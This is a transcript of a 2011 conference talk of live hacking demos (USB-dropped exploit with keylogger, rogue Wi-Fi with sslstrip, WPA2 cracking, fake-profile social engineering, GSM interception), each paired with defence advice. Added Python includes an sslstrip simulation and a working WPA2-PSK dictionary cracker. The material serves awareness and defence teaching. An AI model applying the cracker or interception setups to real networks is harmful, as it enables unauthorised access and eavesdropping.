ECSA Cyber Security Conference 2011
A session of Live Hacking demonstrations at the ECSA Cyber Security Conference 2011 (Belgium) to law enforcement and private community.
Transcript

  • 1. ECSA Cyber Security Conference 2011 – Some hands-on threat demonstrations. Cyber Security 2011 (13-Dec-2011). Filip Maertens, Avydian Cyber Defense. Cyber Defense Group
  • 2. Agenda
    ➤ Demo 1: The Curious Case of Benjamin Button
    ➤ Demo 2: Thanks for the free Wi-Fi
    ➤ Demo 3: Hm. Now, I need free Wi-Fi
    ➤ Demo 4: Social Engineering on social networks
    ➤ Demo 5: Intercepting GSM networks
  • 3. About the speaker
    ➤ Cybercrime investigator and tactical cyber security advisor
    ➤ Head of Cyber-Security at the European Corporate Security Association
    ➤ CISSP, CISM, CISA, CPO, CFE … and CCSP ("certified common sense practitioner")
    ➤ MSc. Information Risk and BSc. Information Operations
    ➤ Mobile aficionado (building mobile channels for Fortune 500 banks)
  • 4. Demo 1 – The Curious Case of Benjamin Button (or how curiosity killed the cat)
  • 5. The Attack - Preparation (1/2)
    ➤ Prepare a USB stick with a maliciously crafted file and drop it somewhere. Then wait.
    ➤ Exploitation of human weakness
    ➤ Exploitation of system weakness
  • 6. The Attack – Preparation (2/2)
    ➤ Make a good payload:
      ➤ Obfuscated key-logger
      ➤ Adobe Acrobat Reader 10.x 0day exploit (PDF)
    ➤ Once Acrobat is exploited, our key-logger is silently installed
  • 7. The Attack – Execution (Step 1)
  • 8. The Attack – Execution (Step 2). Live Demo: Silent install of key-logger
  • 9. Defending against the attack
    ➤ Don't take candy from a stranger:
      ➤ Always approach unknown storage hardware with great caution
      ➤ Do not open files (seriously)
      ➤ … and if you must, open them in an isolated test environment
    ➤ Practice sound personal system security practices
  • 10. Demo 2 – Thanks for the free Wi-Fi! (or, if something looks too good to be true… it usually is)
  • 11. The Attack - Preparation
    ➤ Prepare a rogue access point:
      ➤ Deny access to the existing access point
      ➤ Set up your own access point (with sslstrip)
      ➤ Intercept all traffic going over the wire
    ➤ Exploitation of human weakness
    ➤ Exploitation of system weakness
  • 12. The Attack – Execution. Live Demo: Capture usernames + passwords of a user
  • 13. Defending against the attack
    ➤ Never assume ("it makes an ass of u and me"):
      ➤ Always ask for the SSID of the hotel or public area
    ➤ Be vigilant / aware of abnormal behavior:
      ➤ Someone in a parked car with a laptop
      ➤ Unusually slow Internet access
      ➤ Abnormal traceroute paths
      ➤ Abnormal SSL certificates presented (or broken certificates)
      ➤ Networks you normally join automatically suddenly no longer connect automatically
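The sslstrip step of Demo 2 is easiest to understand as a message exchange. The simulation below is an added example, not the speaker's demo code: a victim browser, a well-configured site (HTTP redirects to HTTPS, HTTPS responses carry HSTS), and a rogue-AP proxy that terminates the victim's plaintext leg, completes the HTTPS leg itself, and rewrites every `https://` it relays to `http://`. The host `bank.example`, the form and the credentials are constructed for the example. It also shows the defence the slide hints at with "abnormal certificates": when the browser already knows the host via HSTS, it upgrades to HTTPS before anything reaches the rogue AP, and there is nothing left to strip.

```python
import re
from dataclasses import dataclass, field

BANK = "bank.example"  # hypothetical host, constructed for this example
HSTS = "Strict-Transport-Security"


@dataclass
class Request:
    scheme: str
    host: str
    path: str
    body: str = ""


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


def origin_server(req: Request) -> Response:
    """The genuine site: plain HTTP gets a 302 to HTTPS, HTTPS responses carry HSTS."""
    if req.scheme != "https":
        return Response(302, {"Location": f"https://{req.host}{req.path}"})
    if req.path == "/login" and req.body:
        return Response(200, {HSTS: "max-age=31536000"}, "welcome back")
    return Response(200, {HSTS: "max-age=31536000"},
                    f'<form method="post" action="https://{req.host}/login">')


class SslStripProxy:
    """Rogue AP in the middle: the victim speaks plaintext HTTP to us, we speak HTTPS upstream."""

    def __init__(self):
        self.captured = []

    def handle(self, req: Request) -> Response:
        if req.body:
            self.captured.append(req.body)  # the form POST arrives in the clear
        upstream = origin_server(Request("https", req.host, req.path, req.body))
        headers = {k: v for k, v in upstream.headers.items() if k != HSTS}  # victim never learns HSTS
        if "Location" in headers:
            headers["Location"] = headers["Location"].replace("https://", "http://")
        return Response(upstream.status, headers, upstream.body.replace("https://", "http://"))


URL = re.compile(r"(https?)://([^/\"]+)(/[^\"]*)?")


class Browser:
    def __init__(self, hsts_hosts=()):
        self.hsts = set(hsts_hosts)  # preloaded, or learned from earlier genuine HTTPS visits

    def fetch(self, network, scheme, host, path, body="") -> Response:
        if host in self.hsts:
            scheme = "https"  # HSTS upgrade happens before anything reaches the wire
        resp = network(Request(scheme, host, path, body))
        if scheme == "https" and HSTS in resp.headers:
            self.hsts.add(host)  # HSTS is only honoured when received over HTTPS
        if resp.status == 302:
            s, h, p = URL.match(resp.headers["Location"]).groups()
            return self.fetch(network, s, h, p or "/")
        return resp

    def login(self, network, host, creds) -> Response:
        page = self.fetch(network, "http", host, "/")  # the user typed the bare hostname
        s, h, p = URL.search(page.body).groups()        # submit to whatever the form action says
        return self.fetch(network, s, h, p, body=creds)


def run(preloaded_hsts: bool) -> list:
    """Return the credentials the rogue AP captured for a victim with or without HSTS knowledge."""
    proxy = SslStripProxy()

    def network(req: Request) -> Response:
        # Plaintext HTTP is terminated by the rogue AP; HTTPS it cannot terminate without a valid cert.
        return proxy.handle(req) if req.scheme == "http" else origin_server(req)

    Browser({BANK} if preloaded_hsts else ()).login(network, BANK, "user=alice&pw=s3cret")
    return proxy.captured


if __name__ == "__main__":
    print("no HSTS:     ", run(False))  # the rogue AP sees the password
    print("HSTS preload:", run(True))   # nothing to strip, nothing captured
```

Note what the victim sees in the stripped case: no certificate warning at all, because there is no certificate, only a page that arrived over plain HTTP where a padlock was expected. That is why "abnormal or missing SSL" is on the defence slide, and why the real fix (HSTS, ideally preloaded) has to live in the browser rather than in the user's attention.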
  • 14. Demo 3 – Hm. Now, I need free Wi-Fi! (wireless hacking for fun and profit)
  • 15. The Attack - Preparation
    ➤ Set up a Linux machine with a wireless card
    ➤ Put the card in monitor mode (often loosely called promiscuous mode), so it listens to all wireless traffic around you
    ➤ Capture traffic until you have captured a WPA 4-way handshake
    ➤ Recover the passphrase (PSK) by cracking the captured handshake offline
  • 16. The Attack – Execution. Live Demo: Hack an Access Point (WPA2-PSK)
  • 17. Defending against the attack
    ➤ Don't use Pre-Shared Key protection:
      ➤ But if you have no choice, make it extremely long (> 35 chars)
      ➤ Change the PSK every month or quarter
      ➤ Change the SSID to a non-default SSID (the PSK is salted with the SSID, so precomputed tables only help against common SSIDs)
      ➤ Don't use WPA2-TKIP, use WPA2-AES (CCMP)
    ➤ Monitor your Internet usage to check for excessive bandwidth usage
    ➤ Have a firewall between the AP and your network
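The "offline cracking" step of Demo 3 is just key derivation plus one comparison per guess. The example below is added here and is not the speaker's demo tooling: it implements the WPA2-PSK chain (PBKDF2-HMAC-SHA1 of passphrase and SSID into the PMK, the 802.11i PRF into the PTK, the first 16 bytes as KCK, and the HMAC-SHA1 MIC over message 2 of the handshake) and runs a dictionary attack against a handshake. The handshake itself is constructed by the same code for a known passphrase, because no real capture is on the page; SSID, MAC addresses, nonces and wordlist are all made up. It also shows why the defence slide asks for a long PSK and a non-default SSID: the 4096-round PBKDF2 is the whole per-guess cost, the SSID is its salt, and nothing in the loop ever talks to the access point.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional

# Offsets inside an EAPOL-Key frame (802.11i): the 16-byte MIC sits at byte 81.
MIC_OFFSET = 81
MIC_LEN = 16


@dataclass(frozen=True)
class Handshake:
    """The pieces of a captured WPA2-PSK 4-way handshake an offline cracker needs."""
    ssid: str
    ap_mac: bytes      # BSSID (authenticator address)
    sta_mac: bytes     # client (supplicant address)
    anonce: bytes      # from message 1
    snonce: bytes      # from message 2
    eapol_msg2: bytes  # full EAPOL frame of message 2, MIC included


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes): the per-guess cost."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, hs: Handshake) -> bytes:
    """PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)); KCK = first 16 bytes."""
    data = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
            + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2/CCMP MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def check_passphrase(hs: Handshake, candidate: str) -> bool:
    """One cracking step: passphrase -> PMK -> KCK, then compare the recomputed MIC with the captured one."""
    kck = kck_from_pmk(pmk_from_passphrase(candidate, hs.ssid), hs)
    captured = hs.eapol_msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), captured)


def crack_psk(hs: Handshake, wordlist) -> Optional[str]:
    """Offline dictionary attack: no further contact with the access point is needed."""
    for word in wordlist:
        if check_passphrase(hs, word):
            return word
    return None


def build_sample_handshake(passphrase: str) -> Handshake:
    """CONSTRUCTED sample (not a real capture): a valid message 2 frame for the given passphrase."""
    ssid, ap, sta = "ECSA-demo", bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    body = (b"\x02"                       # descriptor type: RSN
            + b"\x01\x0a"                 # key info: version 2 (HMAC-SHA1), pairwise, MIC bit set
            + b"\x00\x00"                 # key length (0 in message 2)
            + (1).to_bytes(8, "big")      # replay counter
            + snonce + b"\x00" * 16       # key nonce, key IV
            + b"\x00" * 8 + b"\x00" * 8   # key RSC, key ID
            + b"\x00" * MIC_LEN           # MIC placeholder, filled in below
            + b"\x00\x00")                # key data length (RSN IE omitted in this sample)
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL version 1, type Key
    hs = Handshake(ssid, ap, sta, anonce, snonce, frame)
    mic = eapol_mic(kck_from_pmk(pmk_from_passphrase(passphrase, ssid), hs), frame)
    return Handshake(ssid, ap, sta, anonce, snonce,
                     frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:])


SAMPLE = build_sample_handshake("hunter22")                                  # constructed capture
WORDLIST = ["password", "12345678", "letmein1", "hunter22", "qwertyui"]       # constructed wordlist

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(SAMPLE, WORDLIST))
```

Each candidate costs one PBKDF2 run of 4096 HMAC-SHA1 rounds, which is why the attack is a throughput game: a long random PSK wins by keyspace, not by making a single guess slower, and a unique SSID means any PMK tables an attacker precomputed for common network names are useless against yours.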
  • 18. Demo 4 – Social Engineering on Social Networks (trying to score a date with Sophie Draufster)
  • 19. The Attack - Preparation
    ➤ Back in 2010: Sophie Draufster was born on Facebook and LinkedIn
    ➤ Reason for existence: social engineering of executives of large consulting firms
    ➤ Results:
      ➤ Facebook friends: 105
      ➤ LinkedIn requests: 133
      ➤ Divulging of confidential information: 73
      ➤ Explicit date requests: 33
  • 20. The Attack - Results
  • 21. Defending against the attack
    ➤ Be vigilant and know who you are talking to:
      ➤ Why would a (gorgeous looking) stranger befriend you?
      ➤ Never post / talk / tweet / … classified business
      ➤ Be trained to detect social engineering attacks (paranoia can't hurt)
    ➤ Claim your own identity (before someone else does)
    ➤ Social networks only for offline trusted friends
  • 22. Demo 5 – Intercepting GSM networks (build your own tactical interception device)
  • 23. The Attack - Preparation
    ➤ Become your own operator:
      ➤ Universal Software Radio Peripheral (USRP)
      ➤ GNU Radio project
      ➤ OpenBTS / OpenBSC / SMSqueue
      ➤ OsmocomBB
      ➤ Asterisk
    ➤ Under 1,500 USD you cover up to 300 m of GSM signal (indoor) + 2 channels (850/900/1800/1900)
    [Slide figure, bill of materials: Trixie (priceless), R/TFX900 (175 USD), USRP (800 USD), 52 MHz (37 USD)]
  • 24. The Attack - Background (1/2)
    ➤ GSMA is not too worried, though: "… intercept approach has underestimated its practical complexity. A hacker would need a radio receiver system and the signal processing software necessary to process the raw radio data." (GSMA, Aug 2009)
      ✓ Underestimated complexity: ability to decrypt the A5 family in (near) real time (2009)
      ✓ Underestimated complexity: IMSI catching, bypassing A3/A8, … (2010)
      ✓ Radio receiver system: USRP / USRP2 + GNU Radio + OpenBTS (you know, the software)
  • 25. The Attack - Background (2/2)
    ➤ If it looks like a duck, walks like a duck, talks like a duck, it's a duck!
    ➤ Handset registers to whom? MCC=206, MNC=020 (this is where you say "Hello")
  • 26. The Attack – Execution. Disclaimer – Only used for test and protocol analysis purposes. No real operator MCC or MNC data, frequencies or spectrum used. No operator BTS, BSC or HLR infrastructure is (ab)used. Live Demo: Interception of SMS. Live Demo: Interception of a voice call
  • 27. The Attack – Summary
    ➤ OTP over SMS: Insecure
    ➤ Making calls: Insecure
  • 28. Defending against the attack
    ➤ Sudden and/or repeated network signal loss
    ➤ Sudden 3G data loss (where it is abnormal)
    ➤ Encrypted voice streaming over 3G (A5/3)
    ➤ Sudden downgrade from A5/1 to A5/0 or A5/2
    ➤ … but passive interception is undetectable from the handset
  • 29. Taking it to a non-defendable level
  • 30. ECSA Cyber Security Conference 2011 – Some hands-on threat demonstrations. Cyber Security 2011 (13-Dec-2011). Filip Maertens, filip.maertens@avydian.com
